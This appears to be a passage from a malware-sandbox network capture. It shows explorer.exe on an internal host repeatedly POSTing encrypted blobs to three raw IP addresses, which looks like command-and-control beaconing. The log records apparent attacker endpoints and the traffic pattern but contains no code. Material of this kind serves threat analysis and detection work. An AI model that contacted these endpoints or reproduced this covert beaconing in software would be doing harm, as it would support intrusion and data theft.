2024-07-27 05:45:25 UTC	685	IN	Data Raw: 47 7a 43 73 61 47 37 6e 74 37 47 77 38 66 6e 79 4f 76 34 6b 74 54 45 7a 63 34 53 30 69 4a 39 31 62 73 67 6c 38 6e 65 6b 7a 41 6e 79 65 4f 30 46 4f 6d 70 58 4b 51 33 35 44 47 62 45 76 38 61 76 5a 48 30 62 68 71 2f 73 73 51 37 65 39 47 44 41 35 66 6d 6d 56 32 78 42 79 42 4f 37 6e 37 58 6d 57 75 66 73 55 68 75 78 4d 6a 67 76 4a 2b 77 61 2f 53 77 5a 56 69 31 2b 76 46 2b 43 4b 30 53 77 78 55 6e 6a 30 38 49 35 4e 33 63 66 65 47 48 77 63 31 77 32 6e 33 6c 55 4c 71 4a 4a 4d 7a 48 6b 45 46 32 46 65 64 7a 52 6d 4e 71 55 43 73 35 6e 35 33 51 37 41 79 50 67 4d 47 50 4e 5a 46 7a 35 69 72 71 53 63 74 43 65 74 44 76 50 63 64 6a 53 6e 79 58 37 4b 69 66 39 45 6c 63 79 47 63 71 38 65 76 6e 38 41 6d 67 70 47 53 34 7a 4e 74 46 4f 49 61 78 74 53 4f 54 69 75 41 6e 59 71 39 30 Data Ascii: GzCsaG7nt7Gw8fnyOv4ktTEzc4S0iJ91bsgl8nekzAnyeO0FOmpXKQ35DGbEv8avZH0bhq/ssQ7e9GDA5fmmV2xByBO7n7XmWufsUhuxMjgvJ+wa/SwZVi1+vF+CK0SwxUnj08I5N3cfeGHwc1w2n3lULqJJMzHkEF2FedzRmNqUCs5n53Q7AyPgMGPNZFz5irqSctCetDvPcdjSnyX7Kif9ElcyGcq8evn8AmgpGS4zNtFOIaxtSOTiuAnYq90

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	62343	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:26 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:45:26 UTC	1267	OUT	Data Raw: 4b 56 47 56 48 6e 6f 2f 64 75 4d 4c 67 66 2f 4d 53 38 67 70 51 58 48 4f 73 45 39 4b 2f 71 6b 38 37 35 4c 46 6b 58 2b 41 30 2b 6b 36 79 41 72 7a 6f 56 31 64 38 38 37 54 53 2b 42 73 71 61 70 39 57 68 4a 46 49 4c 70 37 55 41 4f 36 39 53 74 67 2b 78 57 75 33 71 37 74 45 79 64 7a 35 68 4a 4a 52 38 51 65 52 4d 46 32 5a 44 62 37 57 53 41 52 61 4e 4c 67 71 62 6f 6a 2b 72 4e 46 6a 77 54 55 36 73 31 6a 65 78 31 33 52 61 6b 6c 63 4a 69 73 6b 2b 55 76 79 4e 63 41 77 65 38 62 31 38 35 2b 35 70 69 57 67 37 75 41 33 54 37 2b 4f 42 77 47 38 6d 4c 55 33 6c 37 51 50 2b 45 54 48 48 33 79 76 6a 4c 4f 44 55 5a 36 75 66 6b 30 6b 36 47 74 2f 74 32 54 4e 6a 59 6d 4f 70 6d 55 6a 4c 63 2f 6a 31 41 36 50 63 5a 73 55 48 48 32 43 69 58 61 62 45 38 30 6d 6b 57 73 69 65 4b 33 72 6c 7a Data Ascii: KVGVHno/duMLgf/MS8gpQXHOsE9K/qk875LFkX+A0+k6yArzoV1d887TS+Bsqap9WhJFILp7UAO69Stg+xWu3q7tEydz5hJJR8QeRMF2ZDb7WSARaNLgqboj+rNFjwTU6s1jex13RaklcJisk+UvyNcAwe8b185+5piWg7uA3T7+OBwG8mLU3l7QP+ETHH3yvjLODUZ6ufk0k6Gt/t2TNjYmOpmUjLc/j1A6PcZsUHH2CiXabE80mkWsieK3rlz
2024-07-27 05:45:27 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:27 UTC	685	IN	Data Raw: 41 4e 64 2f 5a 31 48 55 68 43 53 42 37 4f 64 6d 37 67 6b 33 33 50 43 6a 72 67 46 57 66 6f 58 53 4a 30 53 45 55 6b 33 37 59 43 6c 64 67 49 62 6e 49 4c 58 57 44 47 54 4a 79 39 45 47 43 49 74 6b 31 63 4d 44 7a 6f 74 66 4a 49 55 70 55 49 2f 5a 53 49 4a 70 34 69 6d 46 56 69 36 46 48 78 4a 5a 79 7a 2f 67 61 35 69 72 41 74 6a 50 57 66 62 37 49 45 58 69 55 4e 51 71 67 34 37 76 48 53 46 72 41 48 65 75 38 75 59 43 68 34 31 71 4f 42 7a 41 4f 62 58 46 30 50 50 72 6f 63 58 36 71 6c 59 5a 44 76 6a 57 4c 76 66 41 34 42 32 31 6f 42 45 52 63 71 54 6a 4b 62 72 34 41 41 34 2f 41 64 64 6b 47 35 71 4a 61 71 50 72 6d 52 51 78 48 49 75 49 45 48 4a 65 55 6e 55 4d 51 30 38 58 44 6f 43 62 62 59 38 43 77 5a 35 31 53 33 63 75 75 64 6e 31 48 62 62 70 74 53 57 75 4e 6d 61 38 64 66 4c Data Ascii: ANd/Z1HUhCSB7Odm7gk33PCjrgFWfoXSJ0SEUk37YCldgIbnILXWDGTJy9EGCItk1cMDzotfJIUpUI/ZSIJp4imFVi6FHxJZyz/ga5irAtjPWfb7IEXiUNQqg47vHSFrAHeu8uYCh41qOBzAObXF0PProcX6qlYZDvjWLvfA4B21oBERcqTjKbr4AA4/AddkG5qJaqPrmRQxHIuIEHJeUnUMQ08XDoCbbY8CwZ51S3cuudn1HbbptSWuNma8dfL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	62344	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:28 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:28 UTC	1122	OUT	Data Raw: 47 53 6d 6f 66 77 4f 74 4b 74 74 58 39 50 58 33 53 58 66 62 4e 77 31 62 38 46 6e 48 66 58 50 74 35 55 53 66 71 73 70 50 37 36 2b 79 56 77 36 37 2f 37 6d 6e 59 62 53 72 51 4a 6e 74 76 6a 61 55 2b 37 41 30 78 4b 57 34 58 64 44 4d 47 73 4a 2f 6a 58 4b 55 67 38 49 5a 45 6e 54 36 66 4c 30 36 52 55 66 4f 68 4e 65 45 42 55 65 39 63 48 78 6b 4f 65 6e 6e 78 4b 4a 4d 36 30 53 65 4a 2b 77 71 2f 70 58 6d 34 2b 6b 32 70 6a 57 44 4e 54 45 4c 33 4e 4f 49 55 4f 6f 38 62 58 39 33 78 35 50 67 71 5a 4b 4a 6b 48 72 55 62 45 48 41 70 53 64 61 7a 30 36 52 37 63 54 4e 4a 6c 49 39 52 42 71 56 59 4e 76 4e 63 34 74 79 6d 4e 7a 52 6b 41 35 36 4c 44 61 4d 6c 5a 49 46 4d 76 38 46 31 74 37 76 71 62 6d 55 76 41 39 49 49 6c 41 53 79 65 2b 65 6b 67 47 4d 52 42 6f 52 67 4a 65 39 61 56 78 Data Ascii: GSmofwOtKttX9PX3SXfbNw1b8FnHfXPt5USfqspP76+yVw67/7mnYbSrQJntvjaU+7A0xKW4XdDMGsJ/jXKUg8IZEnT6fL06RUfOhNeEBUe9cHxkOennxKJM60SeJ+wq/pXm4+k2pjWDNTEL3NOIUOo8bX93x5PgqZKJkHrUbEHApSdaz06R7cTNJlI9RBqVYNvNc4tymNzRkA56LDaMlZIFMv8F1t7vqbmUvA9IIlASye+ekgGMRBoRgJe9aVx
2024-07-27 05:45:29 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:29 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:29 UTC	685	IN	Data Raw: 68 2f 4a 76 7a 72 55 42 34 6e 48 4c 44 6b 74 49 77 31 32 76 46 6a 4c 4b 43 51 73 61 78 38 31 4a 6e 6d 47 66 64 36 42 46 64 50 42 77 48 76 54 54 78 46 4e 44 32 7a 4c 6c 39 76 6c 31 31 71 72 75 67 75 38 2b 69 2f 32 78 58 78 50 33 56 56 37 35 6d 51 45 43 52 44 42 7a 4c 70 38 4a 4e 43 37 76 6a 6f 75 6d 4e 67 68 73 69 4b 59 70 59 4c 6c 61 2b 7a 74 70 6b 4f 72 59 71 52 52 32 6f 68 44 4f 4a 58 41 50 50 65 38 6c 47 4d 32 56 68 34 35 73 4d 69 77 51 65 51 58 55 5a 2b 4e 55 42 2b 6f 2b 57 58 41 68 6a 49 77 33 47 34 48 31 59 31 36 50 4d 45 32 74 49 41 59 63 54 65 55 43 48 44 68 58 4b 52 39 52 38 4c 43 6a 4b 79 6e 70 74 67 66 73 48 33 36 78 6a 51 44 38 70 69 78 79 4a 5a 6d 48 58 58 56 62 51 78 48 37 6c 31 70 64 67 50 79 77 6c 44 31 66 36 41 32 4c 6d 70 31 48 59 77 67 Data Ascii: h/JvzrUB4nHLDktIw12vFjLKCQsax81JnmGfd6BFdPBwHvTTxFND2zLl9vl11qrugu8+i/2xXxP3VV75mQECRDBzLp8JNC7vjoumNghsiKYpYLla+ztpkOrYqRR2ohDOJXAPPe8lGM2Vh45sMiwQeQXUZ+NUB+o+WXAhjIw3G4H1Y16PME2tIAYcTeUCHDhXKR9R8LCjKynptgfsH36xjQD8pixyJZmHXXVbQxH7l1pdgPywlD1f6A2Lmp1HYwg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	62345	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:30 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:30 UTC	1122	OUT	Data Raw: 63 7a 70 59 49 4c 31 4d 4f 53 4f 4d 65 5a 65 69 36 4c 70 72 35 44 69 71 59 38 33 39 79 37 68 74 35 34 37 43 4e 62 32 79 46 36 70 72 51 2f 56 50 2f 53 65 62 57 44 71 65 57 56 38 78 4b 48 77 46 45 58 48 67 49 58 68 43 46 6a 52 65 63 4f 53 69 77 35 76 79 31 4a 35 4a 74 37 47 71 66 6c 45 47 67 74 7a 58 4d 4b 42 41 70 32 59 70 6b 78 7a 66 50 70 41 72 43 61 63 59 6e 59 72 50 4a 65 2f 59 76 2b 78 72 74 44 7a 39 46 6c 69 38 74 4a 51 55 4c 6b 6a 6e 44 35 45 31 73 56 73 2b 39 64 53 57 4c 58 4a 6d 37 37 4f 6e 67 6a 45 72 66 4f 7a 31 30 65 76 48 4e 70 2b 44 52 35 45 69 35 53 36 6d 36 2b 67 42 2f 58 52 75 36 71 30 58 7a 44 31 58 4d 73 6a 52 6d 78 42 53 54 59 43 70 2f 4c 37 54 49 6c 41 4f 42 47 30 78 44 2b 30 74 38 4e 6c 41 59 41 70 31 5a 48 65 44 2b 42 33 62 63 53 36 Data Ascii: czpYIL1MOSOMeZei6Lpr5DiqY839y7ht547CNb2yF6prQ/VP/SebWDqeWV8xKHwFEXHgIXhCFjRecOSiw5vy1J5Jt7GqflEGgtzXMKBAp2YpkxzfPpArCacYnYrPJe/Yv+xrtDz9Fli8tJQULkjnD5E1sVs+9dSWLXJm77OngjErfOz10evHNp+DR5Ei5S6m6+gB/XRu6q0XzD1XMsjRmxBSTYCp/L7TIlAOBG0xD+0t8NlAYAp1ZHeD+B3bcS6
2024-07-27 05:45:31 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:31 UTC	685	IN	Data Raw: 70 37 31 31 6f 37 46 72 50 39 56 5a 36 4a 6c 79 62 6a 2f 58 42 71 6f 64 4b 52 4b 6b 75 73 6f 74 39 4f 79 39 54 48 67 55 46 4e 38 59 73 72 5a 71 50 48 37 52 70 30 35 37 34 70 74 48 6b 6c 77 45 75 6e 5a 54 50 52 6d 4d 51 45 61 5a 34 77 55 62 38 5a 64 36 63 57 4a 57 44 61 44 35 69 38 72 43 53 55 36 32 68 54 37 53 37 4c 59 47 4c 4f 2f 63 44 36 74 6f 48 6c 4b 31 39 66 39 41 4c 54 47 33 66 53 77 69 4c 41 54 59 38 35 4f 32 70 6d 45 70 55 44 42 6a 36 52 36 42 2f 31 52 61 6d 6f 36 75 59 30 45 49 65 48 6e 51 68 6b 55 59 38 61 32 74 69 58 55 55 58 52 54 6b 6c 62 35 6c 78 59 62 44 41 65 50 35 6a 69 6d 6f 46 61 4b 61 34 55 75 39 6d 2b 6f 2b 4a 4a 73 69 78 72 35 66 6a 59 68 56 75 63 36 45 30 38 51 6f 69 75 33 5a 69 69 5a 71 58 2b 4f 44 52 66 66 45 44 53 4c 53 33 6a 71 Data Ascii: p711o7FrP9VZ6Jlybj/XBqodKRKkusot9Oy9THgUFN8YsrZqPH7Rp0574ptHklwEunZTPRmMQEaZ4wUb8Zd6cWJWDaD5i8rCSU62hT7S7LYGLO/cD6toHlK19f9ALTG3fSwiLATY85O2pmEpUDBj6R6B/1Ramo6uY0EIeHnQhkUY8a2tiXUUXRTklb5lxYbDAeP5jimoFaKa4Uu9m+o+JJsixr5fjYhVuc6E08Qoiu3ZiiZqX+ODRffEDSLS3jq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	62346	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:32 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:32 UTC	1122	OUT	Data Raw: 66 4f 70 42 53 30 2f 38 7a 7a 41 51 4d 78 68 6f 31 31 4e 41 76 37 4b 61 74 77 31 61 41 4d 44 6a 68 35 43 46 32 66 50 4d 2f 41 6f 55 56 78 47 38 57 68 33 4c 6e 35 5a 7a 69 31 4c 4d 71 49 48 49 6f 66 63 4b 53 46 68 52 77 49 62 49 76 68 63 74 33 51 52 33 78 72 50 4b 31 66 4e 65 78 51 41 7a 4e 50 33 57 63 6a 54 66 42 57 69 73 42 69 74 64 30 2b 2f 74 4a 52 6c 57 4c 61 76 6a 4b 55 65 44 43 52 59 6a 30 4c 33 74 52 62 6f 56 35 34 4f 74 31 5a 71 6e 32 53 56 65 51 54 43 57 64 5a 47 6a 55 43 65 6f 79 44 75 77 77 79 50 2b 2b 68 49 57 63 47 43 4e 58 55 44 2b 45 36 45 4d 46 72 50 50 4e 6e 4b 31 73 45 6c 57 76 68 6d 57 4b 79 50 38 50 62 62 7a 64 2f 6a 4b 7a 39 6e 68 62 74 36 46 53 67 31 4e 39 7a 31 57 36 31 61 36 65 62 7a 6a 53 5a 6d 6e 67 61 66 4f 4b 65 6f 6b 54 2b 4a Data Ascii: fOpBS0/8zzAQMxho11NAv7Katw1aAMDjh5CF2fPM/AoUVxG8Wh3Ln5Zzi1LMqIHIofcKSFhRwIbIvhct3QR3xrPK1fNexQAzNP3WcjTfBWisBitd0+/tJRlWLavjKUeDCRYj0L3tRboV54Ot1Zqn2SVeQTCWdZGjUCeoyDuwwyP++hIWcGCNXUD+E6EMFrPPNnK1sElWvhmWKyP8Pbbzd/jKz9nhbt6FSg1N9z1W61a6ebzjSZmngafOKeokT+J
2024-07-27 05:45:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:33 UTC	685	IN	Data Raw: 70 56 41 50 68 67 4e 47 54 75 55 58 62 42 49 61 64 71 50 62 66 62 50 67 2f 61 69 34 76 4a 67 73 36 45 58 75 79 39 78 62 4d 7a 53 61 55 4f 4c 4d 47 50 50 71 50 33 58 5a 4e 73 58 78 78 59 47 39 49 6e 47 73 4e 38 48 45 58 52 70 68 43 58 4a 67 5a 64 4a 68 55 56 53 70 71 30 58 45 69 46 37 53 53 4e 75 50 59 53 78 4b 53 71 37 46 75 6f 67 69 50 64 43 53 2b 30 6e 4a 56 37 4c 51 7a 41 42 6a 65 6c 6c 72 6f 67 77 68 4c 39 38 7a 47 51 78 72 64 68 30 6e 4b 30 35 48 41 4f 57 6e 4f 72 6d 69 2b 79 71 6b 31 54 78 34 6e 6d 56 41 5a 43 72 62 47 6d 70 74 75 66 68 51 6d 7a 72 57 4d 50 55 63 41 66 4f 2b 4c 55 47 59 79 30 4d 41 52 4f 4b 62 44 78 54 6f 73 59 62 6d 73 59 6b 2b 56 79 56 55 71 42 69 62 38 42 65 37 30 49 58 58 42 54 66 33 42 38 32 47 55 35 4d 32 57 77 73 51 6e 33 33 Data Ascii: pVAPhgNGTuUXbBIadqPbfbPg/ai4vJgs6EXuy9xbMzSaUOLMGPPqP3XZNsXxxYG9InGsN8HEXRphCXJgZdJhUVSpq0XEiF7SSNuPYSxKSq7FuogiPdCS+0nJV7LQzABjellrogwhL98zGQxrdh0nK05HAOWnOrmi+yqk1Tx4nmVAZCrbGmptufhQmzrWMPUcAfO+LUGYy0MAROKbDxTosYbmsYk+VyVUqBib8Be70IXXBTf3B82GU5M2WwsQn33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	62348	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:34 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:34 UTC	1122	OUT	Data Raw: 4b 31 4a 2b 6d 70 50 64 52 70 77 47 63 77 68 72 7a 52 49 73 6b 79 4b 46 72 6c 47 4d 72 58 4b 6c 66 41 56 53 61 59 44 5a 47 36 33 34 4f 34 51 6b 69 76 39 42 79 65 31 4b 41 2b 74 32 37 69 6f 43 39 41 35 50 48 78 61 48 45 4d 46 39 79 4a 54 51 39 41 63 51 31 57 72 59 65 52 32 5a 57 42 35 4d 55 55 55 79 73 73 37 6a 62 43 77 2b 62 6e 31 6d 5a 34 54 51 56 71 6c 32 52 79 79 4c 54 59 70 42 56 47 36 53 75 42 72 6e 41 71 48 55 7a 67 64 77 31 66 2f 68 4a 31 47 38 7a 4f 7a 43 71 66 55 2f 74 51 46 63 79 30 44 62 5a 49 72 65 53 54 6e 75 31 47 38 71 68 58 6e 43 74 61 5a 58 6e 79 54 6c 41 45 57 6b 6a 4f 4e 4d 6d 61 79 55 69 41 70 48 57 69 4a 66 53 66 31 4c 79 30 52 41 6c 55 4f 55 56 6b 55 4b 59 76 6d 30 4b 77 2b 4a 2b 45 45 31 33 32 68 73 56 52 6a 61 57 6f 2b 76 56 2f 37 Data Ascii: K1J+mpPdRpwGcwhrzRIskyKFrlGMrXKlfAVSaYDZG634O4Qkiv9Bye1KA+t27ioC9A5PHxaHEMF9yJTQ9AcQ1WrYeR2ZWB5MUUUyss7jbCw+bn1mZ4TQVql2RyyLTYpBVG6SuBrnAqHUzgdw1f/hJ1G8zOzCqfU/tQFcy0DbZIreSTnu1G8qhXnCtaZXnyTlAEWkjONMmayUiApHWiJfSf1Ly0RAlUOUVkUKYvm0Kw+J+EE132hsVRjaWo+vV/7
2024-07-27 05:45:35 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:35 UTC	685	IN	Data Raw: 79 52 77 39 76 6b 4f 6e 6e 63 43 52 35 58 33 53 4a 37 65 72 77 79 33 37 41 77 58 44 2f 50 50 67 34 55 71 38 4a 35 6d 30 72 37 39 64 4f 32 4b 41 54 75 72 62 56 70 35 49 67 41 6b 56 4e 62 49 53 6f 74 75 73 74 4f 31 64 64 67 6a 6f 53 38 4f 33 45 37 4f 57 4d 78 7a 37 75 50 72 31 50 7a 34 62 6e 71 73 73 5a 2f 2b 39 6f 67 59 33 52 4b 47 30 5a 44 72 4f 41 44 6b 6e 6e 74 71 2b 74 30 53 65 79 2f 47 51 4a 4e 66 6d 4f 49 68 49 45 51 41 7a 4c 65 6c 55 64 35 51 7a 79 4d 44 5a 69 72 76 4c 7a 6c 62 67 34 72 4c 6d 34 5a 71 36 74 42 54 46 55 66 61 47 6f 4e 4b 49 4e 65 70 32 45 6a 71 54 77 76 42 67 6d 78 56 45 50 67 52 37 4f 79 61 64 67 51 64 50 36 53 32 6b 54 2f 73 52 48 46 6b 72 4c 52 45 47 77 72 4b 49 63 67 36 34 44 59 57 4f 51 52 6f 73 45 54 37 55 6a 6e 78 39 68 36 38 Data Ascii: yRw9vkOnncCR5X3SJ7erwy37AwXD/PPg4Uq8J5m0r79dO2KATurbVp5IgAkVNbISotustO1ddgjoS8O3E7OWMxz7uPr1Pz4bnqssZ/+9ogY3RKG0ZDrOADknntq+t0Sey/GQJNfmOIhIEQAzLelUd5QzyMDZirvLzlbg4rLm4Zq6tBTFUfaGoNKINep2EjqTwvBgmxVEPgR7OyadgQdP6S2kT/sRHFkrLREGwrKIcg64DYWOQRosET7Ujnx9h68

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	62349	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:36 UTC	1122	OUT	Data Raw: 4c 64 72 62 43 52 45 37 31 39 79 5a 4d 4f 65 48 59 4d 57 4c 33 4e 44 69 76 35 2f 62 55 44 61 41 47 55 4c 55 65 39 75 39 31 70 41 62 50 37 31 6f 31 58 75 33 4c 36 70 43 79 55 62 42 58 42 48 42 57 30 33 41 67 50 30 69 6e 50 58 4b 6e 51 46 67 32 6a 6d 6c 42 32 32 49 76 39 62 2b 6e 2f 6a 70 75 34 6c 69 66 74 47 4a 62 4c 68 6a 66 6b 64 69 68 68 58 52 48 4e 6e 45 44 65 64 50 41 6f 4e 5a 64 78 53 45 36 78 65 6b 64 45 6e 6d 75 53 30 6d 4e 58 38 4c 2f 6d 54 77 4f 70 49 79 4c 36 53 54 39 4a 70 72 59 4d 57 42 42 6c 4b 4f 4c 36 41 52 33 33 4c 30 65 33 5a 33 56 42 6c 6d 62 38 54 6b 58 57 49 78 6c 37 50 33 59 41 52 47 61 74 4e 77 48 37 75 53 48 45 59 7a 63 69 4a 77 2f 36 62 77 5a 46 70 43 45 4e 43 46 4a 57 79 79 41 77 32 63 6e 57 35 74 65 67 41 44 73 74 78 39 6f 6b 31 Data Ascii: LdrbCRE719yZMOeHYMWL3NDiv5/bUDaAGULUe9u91pAbP71o1Xu3L6pCyUbBXBHBW03AgP0inPXKnQFg2jmlB22Iv9b+n/jpu4liftGJbLhjfkdihhXRHNnEDedPAoNZdxSE6xekdEnmuS0mNX8L/mTwOpIyL6ST9JprYMWBBlKOL6AR33L0e3Z3VBlmb8TkXWIxl7P3YARGatNwH7uSHEYzciJw/6bwZFpCENCFJWyyAw2cnW5tegADstx9ok1
2024-07-27 05:45:37 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:37 UTC	685	IN	Data Raw: 42 73 66 53 63 51 79 6f 49 33 66 54 4b 4f 72 53 58 59 31 43 6b 46 5a 51 58 57 57 55 6e 78 77 48 31 4f 75 35 4a 6c 7a 38 64 31 72 44 51 31 4e 31 4f 62 38 78 71 4a 43 72 72 49 31 75 34 42 39 71 38 6a 79 6e 68 78 41 37 71 76 62 6f 58 73 7a 77 47 51 34 5a 45 64 7a 4f 7a 65 4f 7a 64 65 39 4d 4f 53 42 62 45 2b 49 78 75 41 4e 48 64 31 2f 6a 6b 54 42 4f 59 51 6a 74 73 30 6c 4f 78 45 64 70 64 56 33 7a 4a 61 47 7a 71 47 65 56 6d 50 4f 46 69 6e 5a 31 4d 44 71 61 52 74 38 55 38 4d 47 37 7a 75 74 32 77 54 4f 67 55 4f 7a 42 64 45 64 49 70 6e 30 4b 70 48 55 35 75 63 43 75 78 49 49 43 75 54 6b 74 75 64 76 69 70 67 35 5a 4c 49 66 55 68 6c 49 64 45 54 53 4e 6a 4f 46 33 6f 43 73 69 48 4f 6d 34 56 69 4d 47 6c 39 61 4a 66 75 33 41 6d 43 71 31 70 71 66 35 39 36 2b 57 4c 30 68 Data Ascii: BsfScQyoI3fTKOrSXY1CkFZQXWWUnxwH1Ou5Jlz8d1rDQ1N1Ob8xqJCrrI1u4B9q8jynhxA7qvboXszwGQ4ZEdzOzeOzde9MOSBbE+IxuANHd1/jkTBOYQjts0lOxEdpdV3zJaGzqGeVmPOFinZ1MDqaRt8U8MG7zut2wTOgUOzBdEdIpn0KpHU5ucCuxIICuTktudvipg5ZLIfUhlIdETSNjOF3oCsiHOm4ViMGl9aJfu3AmCq1pqf596+WL0h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	62350	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:38 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:45:38 UTC	1267	OUT	Data Raw: 44 6e 55 62 6d 6b 6b 44 33 30 35 71 2b 57 6e 53 77 39 35 71 78 72 72 31 76 78 47 32 54 2b 43 4b 63 64 59 66 33 51 74 6b 6f 69 45 43 49 2b 52 48 35 78 36 2f 37 59 59 57 6c 50 4b 4e 39 53 34 57 64 53 4b 35 4a 36 78 70 31 47 43 41 73 34 6a 37 50 32 32 33 6d 30 46 36 61 57 2f 43 6f 78 69 66 55 37 49 79 69 68 4c 56 2f 75 31 50 2b 2b 6c 59 68 70 50 76 6e 4f 5a 53 64 71 57 6e 7a 59 67 77 6a 36 6c 48 79 32 77 45 43 51 33 50 4f 4c 6e 41 70 6a 31 6f 50 36 73 70 6d 45 63 4d 57 4b 57 55 50 6b 59 2f 4c 6a 4d 4f 4f 4e 64 31 72 68 72 6d 55 56 58 6a 59 68 2f 6d 41 4a 59 2f 4c 73 73 42 55 68 42 45 7a 75 46 53 4e 62 30 39 64 36 6e 44 41 4d 75 68 6f 2f 61 70 6e 55 74 50 38 4b 7a 63 50 38 6d 35 4d 72 6d 59 46 4a 43 41 45 61 73 2b 73 6d 36 49 68 39 77 73 46 53 54 71 36 68 2f Data Ascii: DnUbmkkD305q+WnSw95qxrr1vxG2T+CKcdYf3QtkoiECI+RH5x6/7YYWlPKN9S4WdSK5J6xp1GCAs4j7P223m0F6aW/CoxifU7IyihLV/u1P++lYhpPvnOZSdqWnzYgwj6lHy2wECQ3POLnApj1oP6spmEcMWKWUPkY/LjMOONd1rhrmUVXjYh/mAJY/LssBUhBEzuFSNb09d6nDAMuho/apnUtP8KzcP8m5MrmYFJCAEas+sm6Ih9wsFSTq6h/
2024-07-27 05:45:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:39 UTC	685	IN	Data Raw: 4d 2b 61 76 52 49 43 78 35 68 61 57 4f 39 72 4b 36 34 7a 57 42 32 32 71 67 42 39 66 31 44 58 47 6b 30 64 79 51 70 74 68 78 66 65 45 46 30 54 4e 35 35 62 75 5a 65 30 6f 4b 74 35 6d 75 63 53 68 65 57 75 65 75 69 61 32 56 34 68 49 51 49 42 6b 50 5a 34 41 37 61 6c 5a 38 6a 53 2f 30 62 6a 73 55 42 56 45 66 7a 61 6b 68 56 44 78 65 53 75 36 62 67 4f 76 35 50 36 5a 4c 4b 39 54 52 30 6c 41 47 67 2f 53 63 79 36 41 50 69 56 2b 51 51 34 41 71 6b 51 69 66 41 54 50 61 69 58 44 56 79 79 58 31 70 38 2b 6e 50 35 78 4c 58 78 78 49 75 6f 67 43 2f 69 45 69 35 4b 53 2f 30 41 47 33 54 70 73 7a 64 44 59 61 6a 45 58 7a 45 36 57 53 77 33 76 2b 72 34 62 42 6c 71 41 4f 59 67 42 55 46 30 69 41 52 6f 2b 55 54 75 6d 44 61 69 2f 74 62 53 2f 68 48 4a 56 41 53 33 58 46 31 53 7a 67 6f 5a Data Ascii: 